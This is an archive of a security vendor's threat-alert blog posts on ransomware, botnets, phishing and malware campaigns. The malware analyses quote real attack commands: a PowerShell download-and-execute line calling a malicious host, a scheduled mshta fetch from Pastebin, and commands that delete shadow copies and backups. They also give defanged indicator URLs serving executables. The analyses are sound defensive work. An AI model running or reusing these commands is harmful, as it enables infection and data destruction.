David Pickett

NFTs – How Safe Are They?

admin — Wed, 28 Jul 2021 03:58:49 +0000

NFTs – How Safe Are They? admin Tue, 07/27/2021 - 22:58 Trends David Pickett

Just this March, Christie’s Auction House sold a non-fungible token (NFT) based art for more than $69 thousand dollars. Since then, NFTs continue to capture the attention of consumers, celebrities, and businesses around the world, but the security risks associated are very real.

While discovering new and inventive ways to exchange currency is par for the course in the digital age we live in, being aware of the security risks and taking actions to mitigate those risks will be imperative both in the short and long term.

What are NFTs?

NFTs are pieces of digital content that are stored on a blockchain, which is the same foundation for other cryptocurrencies, such as Bitcoin or Ethereum. What sets NFTs apart from other cryptocurrencies like Bitcoin and Ethereum is that each token is completely unique, so, unlike its predecessors, they cannot be traded or replicated.

How safe are NFTs?

NFTs are a burgeoning industry with a lack of regulations and oversight by design as it is blockchain-based, like cryptocurrencies. As such, the security implications will exponentially increase as user adoption grows with new attack vectors continuously discovered. It’s no secret threat actors are motivated opportunists who will attempt to pilfer any asset, physical or digital, that holds value. There have been many high-profile wallet storage attacks in the cryptocurrency industry over the years. Likewise, NFT wallets are an unregulated industry with private companies utilizing varying degrees of cybersecurity defense techniques to prevent attacks. So in short – they aren’t very secure.

Also in March, attackers compromised multiple Nifty Gateway NFT user accounts and were able to transfer the previously purchased NFTs from their account and purchase new ones to transfer with their payment cards on file. While the users’ cash was recovered, the NFTs were lost to the attackers who promptly sold them to another NFT purchaser located on a different platform since the platform itself, like Nifty Gateway, holds the private keys associated with the NFT and they weren’t recoverable after being transferred.

How can you stay safe when handling NFTs?

The most important things users can do to protect their NFTs are simple but important actions to take on all online accounts, which include:

Multi-factor authentication (MFA): While it’s not a failsafe, this simple step makes it exponentially more difficult for threat actors to gain access to your account. By connecting your logins with a phone number or an alternate email account, you can get a notification if someone is attempting to access your account.
Password hygiene: his may seem like another no-brainer, but both consumers and businesses have trouble taking necessary steps to ensure the safety of the passwords themselves. To have good password hygiene, you must use (1) lower and uppercase, (2) numbers, (3) special characters and (4) different and unique passwords for every account. While it takes more effort to remember all the different passwords you use on which sites, there are tools out there that can securely store your passwords, like Keeper or LastPass.
Secure Storage: For both users and companies, when applicable and done properly, cold storage of digital assets (meaning not stored in an online environment) offers the best security from Internet-connected thieves. But even then, cold storage solutions, whether it be hardware, paper or desktop wallets, still must be physically secured to protect against loss, damage or theft.

Because the NFT industry has a lack of regulations and oversight, it’s no secret among threat actors that there are legal loopholes that exist in the industry, which will allow some to operate with impunity in certain scenarios. If you are a current owner of NFTs or are thinking about buying, the best way to proceed is to educate yourself on the vulnerabilities and take the above steps to secure your environment.

For more information on how ��Ƶɫ can protect your financial data including NFTs, check out our Financial Services page.

Secure Modern Workplace

Anonymous Email Attacks via TOR on the Rise

admin — Fri, 21 Aug 2020 23:36:45 +0000

Anonymous Email Attacks via TOR on the Rise admin Fri, 08/21/2020 - 18:36 Threat Alert David Pickett

The Onion Router (TOR) is best known for its ability to anonymize internet web surfing using the specialized open-source software located at torproject.org. It does this for free via encrypting the communication and randomly passing it through a network of volunteers who operate and maintain relay servers (circuits). An exit node is the last server in the chain which performs the final decryption step and sends the original data to its destination.

Email administrators may not realize that TOR is heavily abused for a variety of attacks. In July alone, for example, ��Ƶɫ/AppRiver Advanced Email Threat Protection filters caught over 350,000 messages destined for customers originating from TOR exit node IP addresses. A vast amount of this traffic was comprised of comment form and dating spam. However, more serious threats such as malware, phishing, and COVID-19 themed scams also persist from the TOR exit nodes.

Email Threat Examples Delivered from TOR Exit Nodes

Malware – DHL Theme / AgentTesla Remote Access Trojan
AgentTesla is a remote access trojan under active development that is popular among threat actors because of its price point and ease of deployment. The recent addition of a wifi profile stealing module suggests it may soon become more ambitious by gaining the ability to proliferate by compromising other systems on the same wifi network.

The advertisement for AgentTesla below displays its different license options along with a chatbot to answer questions from those seeking to purchase the software.

Phishing – Adobe Themed Email

This phishing message is an example of an attack delivered from a TOR exit node. The threat actor has chosen to utilize an Adobe Cloud shared document theme with a payload link that adds visual legitimacy by appearing to direct the user to intuit.com. However, upon clicking, this link redirects the recipient to a credential harvesting site hosted on Amazon AWS.

Phishing – Adobe Themed Email Leads to Credential Harvesting Site

COVID-19 Loan Scam Example
This last TOR exit node scam example purports to be from the United Nations COVID-19 Pandemic Trust Fund, offering applicants a low interest rate loan. The goal is to gather sensitive information that would enable the scammer to conduct financial fraud or identity theft. Fortunately, the intended recipient was never exposed to the message because they were protected by ��Ƶɫ/AppRiver.

Our Email Threat Protection caught these TOR exit node scam attacks along with many more. Contact us today for a trial!

��Ƶɫ Blocks Major Form & Survey Abuse Attacks Targeting Microsoft 365 Users

admin — Thu, 09 Jul 2020 23:08:45 +0000

��Ƶɫ Blocks Major Form & Survey Abuse Attacks Targeting Microsoft 365 Users admin Thu, 07/09/2020 - 18:08 Threat Alert David Pickett

Over the past 24 hours alone, ��Ƶɫ/AppRiver advanced email threat protection filters have stopped over 88,000 messages attempting to abuse legitimate forms and survey services. The total count of blocked attacks jumps to an astonishing 590,000 messages over the course of the past week. These numbers provide a glimpse into just how pervasive living off the land attacks have recently become.

In July of 2019, we detailed how attackers were abusing Microsoft Office Excel & Forms Online Surveys to host credential harvesting sites on the service without the need for an external phishing site. These malicious schemes were on Microsoft's radar too, as they added increased automation for phishing detection to their roadmap in this same time period. Since then, attackers have rapidly warmed up to the idea of launching more Living Off the Land (LOtL) attacks by abusing a variety of legitimate form and survey providers.

Top Abused Providers & Metrics

Metrics derived from our advanced email protection filters for these LOtL attacks indicate they have increased over time. Currently, the highest volume of blocked messages abusing the legitimate providers in order from greatest to least volume are:

Google Forms
Microsoft Forms
SurveyGizmo Surveys
HubSpot Forms

Microsoft Forms Abuse Example

A Growing Trend to Intermediary Redirect/Jump Pages

While not a new tactic, there has been a growing trend by these attackers over the past months to utilize an intermediary redirect/jump page before the credential harvesting page. These threat actors still rely upon the legitimate provider for the initial link, but then attempt to either automatically redirect or trick the user into manually clicking onward to the page designed to solicit and steal user credentials.

This tactic is used for a variety of reasons:

The most obvious - these links are for legitimate services, this helps to defeat user awareness training when looking for suspicious links.
Certain providers are becoming more effective at identifying this type of abuse on their site and removing the page faster.
Allows the attacker to autonomously switch phishing links in their email campaigns once the intermediary site is discovered and removed by the service. This allows the attacker to save time and resources from having to set up a new credential harvesting site. They can direct a bot to identify when the site is removed. Once removed, they automatically change the link in the sending scripts for continuity in the phishing campaigns to ensure continuity of the attack with little to no downtime.

DHL Spoofing Email Abusing Google Dynamic Link to Forms

Not already a ��Ƶɫ email threat protection customer? Learn how ��Ƶɫ’s advanced threat protection solutions can help keep your organizations safe against living off the land attacks.

Phorphiex/Trik Botnet Delivers Avaddon Ransomware

admin — Mon, 08 Jun 2020 22:57:51 +0000

Phorphiex/Trik Botnet Delivers Avaddon Ransomware admin Mon, 06/08/2020 - 17:57 Threat Alert David Pickett

The ��Ƶɫ/AppRiver threat team is no stranger to the Phorphiex/Trik botnet and its wide-ranging attacks. On Thursday June 4th, we began capturing a campaign distributed by the same botnet that mirrors the techniques, tactics, and procedures used by one we protected against and analyzed last April. However, this campaign delivers the new Avaddon ransomware, which translates to Abaddon, meaning doom or destruction.

The theme for these messages is very simple. All contain various subject lines that attempt to entice the recipient to open a “photo” along with a wink emoji in the body of the email. The display names for the campaign appear to be all male sender names, unlike the female names observed in the campaign last year. Similar to last year, the attackers again used four numbers as a friendly from domain for this campaign. As of the time this article was written, our Advanced Email Threat Protection filters have captured well over 300,000 of these messages.

The Zip Attachment - Malicious Javascript

All of the messages contain an attachment that arrives in the IMG.jpg.js.zip format. Once the zip is extracted, there is a small 1 kilobyte javascript file inside. This is much smaller than last year’s campaign of 8 kilobytes, largely because the latest version does not contain any additional obfuscation techniques.

The file launches Windows scripting host to run a command launching PowerShell with the execution policy bypass flag. This directs Windows to run the unsigned script without being blocked or displaying any warnings. A file named sava.exe is then downloaded from the IP of 217[.]8[.]117[.]63 into the local temp folder and saved as 5203508738.exe, before it’s executed. The entire payload chain was completed in under a minute in our test environment, with our files encrypted using the .avdn extension.

The Ransom Note & Site

A readme file was left on the desktop with the initial ransom message directing us to a darknet onion address for further decryption information.

Once the victim browses to the darknet site they are required to input a unique encryption ID found inside the readme file. Once entered, a timer begins a count down and displays the monetary demand. In our test environment, we were given 7 days and 12 hours for the $600 USD demand to be paid via bitcoin before the ransom would have been doubled. However, we have also seen a report for a $500 USD demand, demands are likely to vary.

The site also provides instructions on multiple methods for obtaining bitcoin, and 24/7 support assistance, via a chat interface. Also included is a QR code and unique bitcoin wallet address for payment.

The threat actors provide the capability to test decryption with 3 image files to establish trust, and further specify that images are not typically worth as much as other encrypted data. The site offers 9 different language options, providing insight into the wide range of nationalities and victims targeted by the attack.

Affiliate Recruitment and Software Capability Ads

No less than 24 hours before the botnet began sending these malicious messages, researchers began finding affiliate recruitment ads with the ransomware featured on a popular darknet Russian hacking forum. We reached out to researcher David Montenegro (@CryptoInsane on Twitter) who found the threat actors advertisement images and graciously granted us permission to share them for this blog.

Indicators of Compromise

Main object  "IMG126172.jpg.js"
   sha256   cc4d665c468bcb850baf9baab764bb58e8b0ddcb8a8274b6335db5af86af72fb
Dropped Executable File
   sha256   05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2
Malicious IP Connection       217.8.117[.]63

The above IP should be blocked for all communication attempts, it was previously observed loading Predator the Thief in December 2019.

PowerPoint Malware References Drake Lyrics to Drop Lokibot & Azorult

admin — Mon, 20 Jan 2020 21:01:51 +0000

PowerPoint Malware References Drake Lyrics to Drop Lokibot & Azorult admin Mon, 01/20/2020 - 15:01 Threat Alert David Pickett

A malware campaign using PowerPoint as the infection vector caught our eye after we noticed it contained lyrics to a popular Drake song hidden inside a PowerShell command. Depending on the victim, it either dropped the Lokibot info stealer or Azorult remote access trojan. This infection chain all starts with a simple email, such as the example pictured below.

Heavy Obfuscation

Upon opening either of the PowerPoint attachments, it automatically runs a heavily obfuscated visual basic script.

This script uses the Microsoft HTML application host (mshta.exe) to reach out to a Bitly shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses the command line to task kill Excel & Word, if running.

"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe

After that, it creates a scheduled task for mshta to reach out to a Pastebin url every 60 minutes. This is where an encoded script is located and the url it retrieves dictates whether the recipient ultimately receives the Lokibot or Azorult payload in our samples.

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F

Once decoded, this translates into a PowerShell script that contains a reference to Drake's "Keke Do You Love Me" lyrics. This attacker “Master X”, retrieved from the metadata inside the PowerPoint, had a sense of humor when he was creating the invoke-expression cmdlet. "Master X" also obfuscated the ‘DownloadString’ inside this PowerShell script below in another attempt to avoid defense solutions monitoring PowerShell activity.

This script reaches out to paste.ee and downloads a malicious executable named calc.exe. We can see this retrieved malicious executable file header when loading up the paste.ee site.

Sanitized Indicators of Compromise:

Lokibot sample:

Dropped executable file

sha256 80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22

C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe

DNS requests

domain d228z91au11ukj.cloudfront[.]net

domain xnasxjnasn.blogspot[.]com

domain paste[.]ee

domain j[.]mp

Connections

ip 143.204.214.11

ip 104.20.68.143

ip 107.175.150.73

HTTP/HTTPS requests

url hxxp://j[.]mp/mo7xasnnr

url hxxp://107.175.150[.]73/~giftioz/.cttr/fre.php

url hxxp://pastebin[.]com/raw/CNtXYPpn

Azorult example:

Main object - "Purchase Order A6.pps"

sha256 a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3

DNS requests

domain j[.]mp

domain xnasxjnasn.blogspot[.]com

domain resources.blogblog[.]com

domain paste[.]ee

Connections

ip 104.20.68.143

ip 23.106.160.1

HTTP/HTTPS requests

url hxxp://j[.]mp/ml2xasnnr

url hxxp://pastebin[.]com/raw/C5qNg3Dr

url hxxp://paste[.]ee/r/sFV9L

url hxxp://23.106.160[.]1/Panel/2/index.php

Learn more about how advanced threat protection from ��Ƶɫ can help protect your organization from this and other threats.

Ransomware Drops, Rocks, & Locks: FTCode Ransomware Plays Music While It Encrypts Your Files

admin — Thu, 17 Oct 2019 19:36:05 +0000

Ransomware Drops, Rocks, & Locks: FTCode Ransomware Plays Music While It Encrypts Your Files admin Thu, 10/17/2019 - 14:36 Threat Alert David Pickett

This article originally appeared on the AppRiver blog.

A ransomware named FTCode is being used in email campaigns targeting Italian customers. These have been arriving posing as resumes, invoices, or document scans. While monitoring for new variants we spotted a visual basic script (.vbs) which departed from the norm of what we have been recently analyzing in the fact it played music for us while encrypting files.

Chain of Infection

The .vbs file initially launches PowerShell (script below) to download and play a mp3 file from archive.org. At first glance we suspected it was just a renamed file extension for malware, a common practice to help evade some network gateways. However, we were amused to find it launches a Rammstein song mix. Rammstein is a German band formed in 1994 known for titles such as “Du Hast” and “Engel”. (More information about Rammstein’s music may be found at their site.)

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = $env:temp + '\ramst007.mp3';(New-ObjectNet.WebClient).DownloadFile('https://archive.org/download/RammsteinRammsteinMix/Cast_1_64kb.mp3',$a); Start-Process $a;iex ((New-Object Net.WebClient).DownloadString('hxxp://ceco.myheritageins[.]com/?need=streetm&vid=vbs4&4643'));

While you are rocking out to Rammstein, the script also reaches out to a different domain (myheritageins[.]com) to pull down another .vbs file. This one turns out to be the Jasper malware loader, it enables the actors to load additional malware of their choosing. In our test environment, it created a WindowsApplicationService.lnk shortcut in the Startup folder and utilized Windows task scheduler to achieve reboot persistence. At this point the malware will check to see if this file exists on the machine:

C:\Users\Public\OracleKit\w00log03.tmp

If the file does not exist, it will create it along with sending the encryption key and machine identification data to the attackers’ server. In the test environment it sent the information below:

ver=1008.1 vid=vbs4 guid=0b802504-742f-42da-ae14-a6dda797aee3 ext=df646e&ek=GuOd8Z6nvkC9eq2HJN0QUaBTjtlVSM7ybgzxImF1PDKXiA3w5L

If the file (C:\Users\Public\OracleKit\w00log03.tmp) does already exist, it surmises the machine has already been encrypted and the script does not run the ransomware. By creating this file and putting any data inside, users or administrators may be able to immunize the machine and prevent the ransomware from running. However, we anticipate attackers will add extra checks to help prevent this from occurring.

Like other ransomware, ftcode will also run the following commands to ignore boot failures, disable recovery, delete shadow volumes and system backups:

"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures "C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no "C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet "C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup "C:\Windows\system32\cmd.exe" /c wbadmin delete backup "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet

The file extensions encrypted include an extensive list, impacting the following file types greater than 50kb in size:

.sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, .forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt

Upon encrypting these file types, they will be renamed to an .ftcode extension. A note will also be left on the desktop of the machine instructing the user to download, install, and visit an onion site for further instructions. The onion site offers the visitor a chance to test file decryption with one file before they pay. This is an attempt to establish trust that decryption is possible with the user. The ransom starts out at $500. After 3 days it climbs to $2500, 5 days to $5000, and 10 days to $25000. It also threatens the private key will be deleted after 30 days (the files will not be recoverable).

Ransomware wallet addresses are typically unique to each attack. Regardless, we checked the balance in one and there wasn’t any BTC in it at the time of writing this blog.

Be Vigilant

Users should be vigilant to never click on or open unsolicited links or documents, especially with file types they aren’t familiar with such as script files (.vbs, .js, .ps1, .bat, etc.). Any Office file that, once opened, urges the user to Enable Content or Enable Editing should be treated with the utmost caution and verified from the sender out of band before doing so. If the file is malicious, enabling content or editing disables Microsoft’s protected view and can allow a malicious payload contained within to execute.

If no backups are available to restore files from, impacted users may also verify the type of ransomware at ID Ransomware to see if a publicly available decryptor for their particular ransomware attack exists. If not, they can also sign up for notifications to receive an alert if one becomes available in the future.

Learn how ��ƵɫProtect can help keep your inbox safe from ransomware like FTCode, along with other advanced threats.

Threat Alert: Microsoft Azure Currently Hosting Malware

admin — Mon, 03 Jun 2019 18:29:01 +0000

Threat Alert: Microsoft Azure Currently Hosting Malware admin Mon, 06/03/2019 - 13:29 Threat Alert David Pickett

This article originally appeared on the AppRiver blog.

On Sept. 7, 2018, AppRiver detailed how malicious attackers abused Azure's Custom Domain Name registrations to host credential phishing sites. On April 29, 2019, we released information on how compromised user data was exposed from attacks originating from phishing sites hosted on Azure.

Now the attacks have escalated to malware being hosted on the Azure service. Not only is Azure hosting malware, it is also functioning as the command and control infrastructure for the malicious files.

On May 11, 2019, malware researchers @JayTHL & @malwrhunterteam discovered the malicious software on Azure. It was reported to Microsoft on May 12 for abuse via ticket #SIR0552640. However, the original malware (plus additional samples uploaded since) still resided on the Azure site as of May 29, 2019 - 17 days later.

Malware Agent Detected by Windows Defender

No service is infallible to being attacked or exploited. It's evident that Azure is not currently detecting the malicious software residing on Microsoft's servers. However, if a user attempts to download the executables, Windows Defender does detect the malicious files.

The first sample (searchfile.exe) was uploaded to VirusTotal on April 26, 2019. Windows Defender detects it as Trojan:Win32/Occamy.C. However, it does not appear the service is currently scanning Azure sites or, one could surmise that these files would've been detected by now. Another sample (printer/prenter.exe) was first submitted April 30, but also remains undetected on Azure servers.

Analysis of printer.exe shows the sample being a simple uncompiled c# .net portable executable file. Using an uncompiled file is an evasion attempt for avoiding gateway and endpoint security solutions that heavily scrutinize downloaded binaries. Upon execution, the command line is invoked to run the the built-in visual c# compiler which activates the payload.

Once running, this malicious agent generates XML SOAP requests every 2 minutes to check-in and receive commands from the malicious actors Azure command and control site at: systemservicex[.]azurewebsites[.]net/data[.]asmx

��Ƶɫ Protection

It only takes one malicious email to infiltrate your network or take hostage your data. Minimize that risk with the right solution, the right approach and the right people behind it. With multi-layer protection and live email security experts, ��ƵɫProtect takes the guess work out of keeping your email, employees and business safe from the latest threats.

Stop evasive malware campaigns in their tracks with ��ƵɫProtect.

Microsoft Azure Customized Domain Name Phishing Attacks

admin — Mon, 29 Apr 2019 18:08:08 +0000

Microsoft Azure Customized Domain Name Phishing Attacks admin Mon, 04/29/2019 - 13:08 Threat Alert David Pickett

This article originally appeared on the AppRiver blog.

On Sept. 7, 2018, AppRiver detailed how malicious attackers abuse Microsoft Azure's Custom Domain Name registrations to host credential phishing sites.

This type of "living-off-the-land" attack utilizes phishing sites which reside on Microsoft's web servers. The phishing emails are also frequently sent from Microsoft's servers. Attackers are currently using: .web.core.windows.net, .blob.core.windows.net, and .azurewebsites.net for these customized Azure domain name attacks.

While researching the latest variants, we discovered some interesting finds that warrant an update to our previous threat alert. The first find was a successful attack where 284 different user credentials and geolocation information was exposed to the internet.

The second find was inevitable and anticipated - attackers began embedding these malicious links in attachments, which ��Ƶɫ and AppRiver's email security filters are capturing.

Compromised User Data Exposed

For this particular attack, the malicious actor registered office360outlooksupport as their Azure storage custom sub-domain to exploit unsuspecting users. Following the link to the phishing site yields the all-to-familiar clone of the Microsoft login portal. It automatically pre-fills the recipient's address by using the address inserted into the phishing email they received.

Viewing the source code of the phishing portal, we were able to see the attacker was posting the stolen data to an external compromised site. Ironically, the compromised site where the credentials were being sent was a website design company located in Kathmandu, Nepal, who had no idea this was occurring. Upon navigating to the site, we found the attacker had left an open directory. This allowed us to navigate thru the site structure and we noticed a file named, "emails_and_pass.txt."

Inside the emails_and_pass.txt file were 284 compromised users who had attempted to login to the phishing portal along with their geolocation data. While the attacker went thru the effort of crafting the phishing emails and site, they had left the stolen credentials open for anyone to see. Many of these users had attempted to login multiple times using different passwords. By doing this, attackers also have visibility into how these users have changed their passwords over time. This opens the possibility to additional password attacks directed toward those users.

Azure Customized Domain Phishing Links Now Inside Attachments

Since our previous threat alert, malicious actors also have begun to insert these Azure phishing links into Word and PDF attachments as well. This makes it simple for an attacker to create weaponized pdfs without having to purchase pdf creation software.

��Ƶɫ & AppRiver Tips

Always check the 365 login portal url you are using and only sign in to https://portal.office.com or https://login.microsoftonline.com.
Add company branding to help reduce the risk of a user logging into a phishing site.
Setup multi-factor authentication for 365 users. In the event the credentials are compromised, this lessens the risk of the attacker being able to use them for malicious purposes.
Leverage the Microsoft Secure Score to assist in improving security posture.

Phorphiex/Trik Botnet Campaign Packs a Strong Payload Punch

admin — Tue, 09 Apr 2019 17:54:55 +0000

Phorphiex/Trik Botnet Campaign Packs a Strong Payload Punch admin Tue, 04/09/2019 - 12:54 Threat Alert David Pickett

This article was originally published on the AppRiver blog.

There are few botnets with the capability to send tremendous volumes and pack an infection chain as malicious as the Phorphiex Worm/Trik botnet this year.

For 2019, the Mealybug threat group has garnered the most media attention with Emotet attacks. However, the Phorpiex/Trik botnet is not to be easily outdone. AppRiver filters have captured more than 1.4 million directly attached malicious messages this year, with 847,947 of those messages arriving since April 4, 2019.

The infection chain for this attack packs a serious punch to unsuspecting users worldwide. It begins with a phishing email containing a zip file. Once the javascript file inside the zip has been launched it quickly loads the Phorphiex worm/trojan loader, Gandcrab ransomware, Ursnif ISFB (Gozi) banking trojan, and the CryptoNight XMRig cryptocurrency miner.

Phorphiex also known as Trik Botnet (SDBot Fork)

The Phorphiex worm is a decade-old worm which historically spread via live chat (Windows Messenger / Skype) and USB storage drives. Most recently it made news due to a leaky server which revealed 43,555,741 unique email addresses spread across 4.6 million domains. Lately it has been tracked via the alternative name of Trik (SDBot Fork), but should not to be confused with the Trickbot banking trojan.

Trik uses IRC for it's command and control communication and contains the ability to download and run additional exectubles, brute force email credentials, and utilize infected systems to further propagate spam and malicious payloads.

The sample we inspected contained the ability to disable anti-virus and firewall protection by modifying the Windows registry values: AntiVirusOverride, UpdatesOverride, FirewallOverride, AntiVirusDisableNotify, UpdatesDisableNotify, AutoUpdateDisableNotify, & FirewallDisableNotify.

It also contains basic anti-analysis capabilities to determine if it's in a malware research environment. Methods include comparing running processes to known analysis tools, checking folder names, user names, using the FindWindow API, and checking for debugging via the IsDebuggerPresent function.

Trik Botnet Phishing Emails

The best thing going for users is that Trik spam emails are relatively simple to recognize. The sending addresses utilize a bogus name followed by two random numbers @ then four random numbers.com.

These names and numbers used for the spam emails are hardcoded lists into Trik and follow a basic structure. The subjects vary, however, for this campaign the body contains the same smiley emoji and attachment naming format of PIC#'s-JPG.zip.

Initial Payload (1.exe) - Gandcrab Ransomware v5.2

Gandcrab is the most widely distributed ransomware via email so far this year. The authors, known by some researchers as Pinchy Spider, continuously update it to help avoid anti-virus detection. It is a Ransomware-as-a-Service (RaaS) business model. Pinchy Spider takes a 60-70% cut from profits for actors who utilize the software.

New ransomware senders can also pay Pinchy Spider $100 for up to 200 victims during a two-month period. In addition, it's available to license for $1200. This allows more skilled attackers to utilize their own logo and update the code as needed to help avoid detection. Since many different actors use Gandcrab, demanded ransom amounts vary widely but have been documented anywhere from $250 to over $400,000.

Decryption software exists for many versions prior to 5.2 but there is no way to currently decrypt this version for free. Version 5.2 was likely released in response to the decryption tool becoming publicly available.

Cryptojacking Payload (2.exe) - CryptoNight XMRig Miner

Cryptojacking a machine is simply the unauthorized use of someone else's machine to mine cryptocurrency. Chaining a cryptocurrency miner into an attack that already includes ransomware, and a banking trojan ensures profitability for the malicious actor.

Open source software XMRig allows mining for Monero cryptocurrency via CPU or GPU hardware. Bitcoin requires the more expensive GPU hardware to effectively mine the currency. However, the CryptoNight XMRig algorithm favors CPU's, malicious actors gain a higher monetary gain for successful attacks.

Captured JSON Login Communication - Sent to 92.63.197.153:7575

{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"eeeb5d54-7880-42a7-b542-739bbc26cf4b","pass":"x","agent":"XMRig/2.13.1 (Windows NT 6.1; Win64; x64) libuv/1.20.3 gcc/8.2.0","algo":["cn/r","cn/wow","cn/2","cn/1","cn/0","cn/half","cn/xtl","cn/msr","cn/xao","cn/rto","cn/gpu","cn"]}}.

Banking Trojan Payload (4.exe) - Ursnif / Gozi ISFB

Ursnif / Gozi is one of the top global threats as a banking trojan with global distribution since 2007. The original Russian author, Nikita Kuzmin, was caught then court ordered $6.9 million in restitution along with serving 37 months in prison before being released under undisclosed terms.

Since then the Gozi source code has been leaked, improved, and new features added. The current version is now known as Ursnif / Gozi ISFB and is located on GitHub for anyone to utilize. The attacks we see most often (beside Trik campaigns) are the Dark Cloud botnet distributing it in the form of conversation hijacking attacks or fake resumes. However, many groups mobilize the trojan due to it's evasive capabilities for avoiding detection and analysis.

Major ISFB stealer functionalities:

Keylogging
Capturing Screen Shots & Video of activity being conducted on the system
Extracting browser cookie information preserving the structure directories
Retrieve Certificates stored in the Windows system store
Harvest email credentials
Use browser APIs to hook calls & serve up substitutions (phishing sites) of legitimate banking sites
Capture FTP Credentials

Indicators of Compromise (IOC):

Main object - "PIC074780520-JPG.js:"
sha256 5ef40d547de68ffbb7c265ae074b24ae34bffaaa4420d25fe7d9c70f81c952e8 sha1 c4f7f94fe74dfe1ec1b9807806bc4cc87d1d487d md5 2d0df477069cba3cf75ec987a0e9270f

Dropped Executable File:
sha256 C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\619514.exe90d3580e187b631a9150bbb4a640b84c6fa990437febdc42f687cc7b3ce1deac sha256 C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\1[1].exe22709d7884e71cdeb419e81453644edef69f8373a7a676c85c4d85f1ab67be46 sha256 C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2U1WPAC\2[1].exe1a26ce3b96b1ccd7af4c8d6f4de0e4b4320535b20895a295e1a96aa009843a71 sha256 C:\Users\admin\AppData\Local\Temp\2482930933.exe60924e938260500bea6ca3a3475455bdea8ec70ad6df3358f2f867460061c535

DNS requests:
domain efhoahegue[.]ru domain afhoahegue[.]ru domain tfhoahegue[.]ru domain rfhoahegue[.]ru domain xfhoahegue[.]ru domain afhoahegue[.]su domain efhoahegue[.]su domain rfhoahegue[.]su domain tfhoahegue[.]su domain xfhoahegue[.]su domain resolver1.opendns[.]com domain 11totalzaelooop11[.]club domain www.kakaocorp[.]link domain myip.opendns[.]com domain adonis-medicine[.]at

Connections:
ip 92.63.197.153 ip 208.67.222.222 ip 188.254.179.205 ip 107.173.49.208 ip 192.35.177.64

HTTP/HTTPS Requests:
url http://adonis-medicine[.]at/images/QCnhd13eICD_2/FPJ2piPS/PS_2Bxev9vpAGP4MTx_2F5v/1dd3qTe_2F/hU3xzApMxcvBsHkWM/SXNfDncA7LDF/cVEdPbPh7A_/2BX1p7Me4FE5_2/BWTVpI8Ll3n3urrWJ2ccF/j207fj_2B1A7SCAa/mGyGbrlGM_2FGYg/BXvsEnZXARx0xFm_2F/r5ulwkYbj/sO_2FgZRsy6rhMRprx_2/BMLflLF.gif url http://92.63.197[.]153/s/4.exe url http://92.63.197[.]153/s/3.exe url http://adonis-medicine[.]at/images/Xpzysfts0_2Fc_2FVlnv/NVGgAHDEh1TFvW_2Byg/MmdXsFq9DvBELXouRNsWNb/6jOOxvSLBXkgr/br9sw7Ua/tnGUy90pkA4OkqPP8Eg5kHe/H32t42meYu/pqbX6lOVuidptuaA9/VqdUlN0_2BRK/3fteGZrDG0t/Bs8MrcyOvwh0Fb/wyJqwrzppTtLvuRjEuFmu/ziUfZmNLeqU7M_2B/wQKEgXFVauQB_2B/HSqc3.bmp url http://92.63.197[.]153/s/VNEW=1 url http://92.63.197[.]153/good.exe url http://92.63.197[.]153/s/1.exe url http://92.63.197[.]153/s/2.exe url http://92.63.197[.]153/s/5.exe url http://www.kakaocorp[.]link/ url http://92.63.197[.]153/update.txt